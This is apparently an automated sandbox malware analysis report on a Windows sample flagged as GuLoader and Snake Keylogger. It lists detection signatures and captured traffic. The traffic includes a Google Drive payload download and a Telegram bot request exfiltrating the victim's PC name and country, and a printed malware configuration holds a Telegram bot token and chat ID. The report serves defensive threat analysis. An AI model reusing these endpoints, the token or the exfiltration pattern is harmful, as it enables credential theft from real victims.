Windows Analysis Report
Fa24c148.exe

Overview

General Information

Sample name: Fa24c148.exe
Analysis ID: 1543766
MD5: 7644ebbf786053ffaf95dbe86b7de5d4
SHA1: 5d563fb10f6d71049ae5f69fb6ccb9f2217ddf32
SHA256: 0b7ba80811d300aefe42de77b7b8fb2d5b6f9a8d4f2cf3d1213b6fead5efb59b
Infos:

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8148338634:AAFvLNrhxaF7bMPzQMLbUnueRMJvDIi5kcU", "Chat_id": "7698865320", "Version": "4.4"}
Multi AV Scanner detection for submitted file
Source: Fa24c148.exe ReversingLabs: Detection: 15%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E687A8 CryptUnprotectData, 4_2_35E687A8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E68EF1 CryptUnprotectData, 4_2_35E68EF1
Uses 32bit PE files
Source: Fa24c148.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.65:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004055FF
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_004060BA FindFirstFileW,FindClose, 0_2_004060BA
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_00402770 FindFirstFileW, 4_2_00402770
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_004055FF
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_004060BA FindFirstFileW,FindClose, 4_2_004060BA
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 0016F45Dh 4_2_0016F2C0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 0016F45Dh 4_2_0016F4AC
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 0016F45Dh 4_2_0016F52F
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 0016FC19h 4_2_0016F961
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35782C19h 4_2_35782968
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 357831E0h 4_2_35782DC8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578E0A9h 4_2_3578DE00
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578D7F9h 4_2_3578D550
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 357831E0h 4_2_3578310E
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 357831E0h 4_2_35782DB8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578DC51h 4_2_3578D9A8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_35780040
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578FAB9h 4_2_3578F810
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578D3A1h 4_2_3578D0F8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578CF49h 4_2_3578CCA0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578F209h 4_2_3578EF60
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35780D0Dh 4_2_35780B30
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35781697h 4_2_35780B30
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578EDB1h 4_2_3578EB08
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578F661h 4_2_3578F3B8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578E501h 4_2_3578E258
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578E959h 4_2_3578E6B0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E69280h 4_2_35E68FB0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E67EB5h 4_2_35E67B78
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6CCB6h 4_2_35E6C9E8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E618A1h 4_2_35E615F8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6ECA6h 4_2_35E6E9D8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E65E81h 4_2_35E65BD8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E61449h 4_2_35E611A0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6BA76h 4_2_35E6B7A8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E62E59h 4_2_35E62BB0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E65A29h 4_2_35E65780
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6FA56h 4_2_35E6F788
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6DA66h 4_2_35E6D798
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E60FF1h 4_2_35E60D48
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6E816h 4_2_35E6E548
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6C826h 4_2_35E6C558
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E62A01h 4_2_35E62758
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E679C9h 4_2_35E67720
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E655D1h 4_2_35E65328
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E625A9h 4_2_35E62300
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6D5D6h 4_2_35E6D308
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6B5E6h 4_2_35E6B318
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E60B99h 4_2_35E608F0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6F5C6h 4_2_35E6F2F8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6C396h 4_2_35E6C0C8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E67571h 4_2_35E672C8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E65179h 4_2_35E64ED0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E62151h 4_2_35E61EA8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6E386h 4_2_35E6E0B8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then mov esp, ebp 4_2_35E6B081
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E66733h 4_2_35E66488
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E60741h 4_2_35E60498
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E63709h 4_2_35E63460
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6F136h 4_2_35E6EE68
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E67119h 4_2_35E66E70
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6D146h 4_2_35E6CE78
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E64D21h 4_2_35E64A78
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E602E9h 4_2_35E60040
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E61CF9h 4_2_35E61A50
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E648C9h 4_2_35E64620
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6DEF6h 4_2_35E6DC28
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E662D9h 4_2_35E66030
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6BF06h 4_2_35E6BC38
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E632B1h 4_2_35E63008
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E66CC1h 4_2_35E66A18
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B6970h 4_2_367B6678
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B4746h 4_2_367B4478
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BD768h 4_2_367BD470
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BAC60h 4_2_367BA968
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B0C2Eh 4_2_367B0960
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B8158h 4_2_367B7E60
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B3E26h 4_2_367B3B58
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BEF50h 4_2_367BEC58
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BC448h 4_2_367BC150
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B5E16h 4_2_367B5B48
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B9940h 4_2_367B9648
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B030Eh 4_2_367B0040
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B6E38h 4_2_367B6B40
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B3506h 4_2_367B3238
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BDC30h 4_2_367BD938
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BB128h 4_2_367BAE30
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B54F6h 4_2_367B5228
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B8620h 4_2_367B8328
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BF418h 4_2_367BF120
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B2BE6h 4_2_367B2918
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BC910h 4_2_367BC618
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B19DEh 4_2_367B1710
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B9E08h 4_2_367B9B10
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B4BD7h 4_2_367B4908
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B7300h 4_2_367B7008
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BE0F8h 4_2_367BDE00
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B22C6h 4_2_367B1FF8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BB5F0h 4_2_367BB2F8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B10BEh 4_2_367B0DF0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B8AE8h 4_2_367B87F0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B42B6h 4_2_367B3FE8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BF8E0h 4_2_367BF5E8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BCDD8h 4_2_367BCAE0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B6347h 4_2_367B5FD8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BA2D0h 4_2_367B9FD8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B079Eh 4_2_367B04D0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B77C8h 4_2_367B74D0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BE5C0h 4_2_367BE2C8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BBAB8h 4_2_367BB7C0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B5986h 4_2_367B56B8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B8FB0h 4_2_367B8CB8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BFDA8h 4_2_367BFAB0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B3076h 4_2_367B2DA8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BD2A0h 4_2_367BCFA8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B1E47h 4_2_367B1BA0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BA798h 4_2_367BA4A0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B5066h 4_2_367B4D98
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B7C90h 4_2_367B7998
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BEA88h 4_2_367BE790
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B2756h 4_2_367B2488
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BBF80h 4_2_367BBC88
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B154Eh 4_2_367B1280
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B9478h 4_2_367B9180
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367F1FE8h 4_2_367F1CF0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367F0CC8h 4_2_367F09D0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367F0338h 4_2_367F0040
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367F1B20h 4_2_367F1828
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367F1190h 4_2_367F0E98
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367F1658h 4_2_367F1360
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367F0801h 4_2_367F0508
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_36833E70
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_36833E60
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_36830A10
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_368308DE
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_36830960

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%2028/10/2024%20/%2022:44:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 132.226.247.73 132.226.247.73
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 142.250.185.206:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%2028/10/2024%20/%2022:44:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
